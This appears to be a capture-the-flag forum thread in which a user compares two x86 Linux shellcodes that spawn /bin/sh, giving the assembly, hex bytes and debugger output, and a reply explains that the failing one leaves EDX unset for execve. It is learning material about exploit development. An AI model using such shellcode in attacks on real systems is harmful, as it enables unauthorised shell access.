App - System

Hi !

I just suceed the Bufferoverflow basic 4 challenge.
During my work around it, I ran into something I just can’t explain.
I had got a shellcode launching bin/sh, the usual, and i did not work.
I changed for another one found on the net, and the last one worked. I just can’t explain why. Here are the codes :

SHELLCODE_KO : (Not working)

xor eax,eax
push eax
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
int 0x80

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

=== when debugging, breaking at int 0x80 instruction :

eax 0xb
ebx 0xffffcdb8
ecx 0xffffcdb0
edx 0x41

x/6w $esp :

0xffffcdb0: 0xffffcdb8 0x00000000 0x6e69622f 0x68732f2f
0xffffcdc0: 0x00000000 0x00000000

So it should run 0xb syscall, execve, on the string at 0xffffcdb8, ie "/bin//sh". Why is it not working ?
I can’t understand why it does push eax and push ebx line 6 and 7 either ???

And it’s not just the shellcode itself, I tested it with a simple C code, and it does work, but not on the elf from this challenge ...

=======================================================================================

SHELLCODE_OK : (This one works and indeed spawn a shell)

xor ecx,ecx
mul ecx
push ecx
push dword 0x68732f2f
push dword 0x6e69622f
mov ebx,esp
mov al,0xb
int 0x80

\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

=== at int 0x80 instruction :

eax 0xb
ebx 0xffffcdb8
ecx 0x0
edx 0x0

x/6w $esp :

0xffffcdb8: 0x6e69622f 0x68732f2f 0x00000000 0x00000000
0xffffcdc8: 0x00000044 0x00000004

The syscall just got the same parameters, did’nt they ? So why this one is working ? That’s my question =)

I’m not giving a script to easily reproduce this "error", to not spoil the challenge.

Thanks for your help, I’d really like to understand this, before proceding to next challenges !

The first shellcode simply doesn’t set the value of EDX register.
It can be anything then, and it surely isn’t a char** type, as expected by the execve syscall. You can see the return value of the syscall in EAX, if it is negative (most significant bit set), then an error happened.
You simply have to xor EDX, EDX before triggering the syscall.
In the second shellcode, you cannot see any operations directly involving EDX, because the mul instruction multiplies ECX (zero) by EAX (any value), and stores the result in both the EAX and EDX registers (avoiding overflow). Hence, EDX and EAX are implicitly set to zero in one instruction.

Thanks, now I understand !

I was indeed missing informations ... I used this syscall table :
http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html

And it states that execve syscall doesn’t use the ecx and edx values. But it does ! hence my mistake ...

Thanks again =)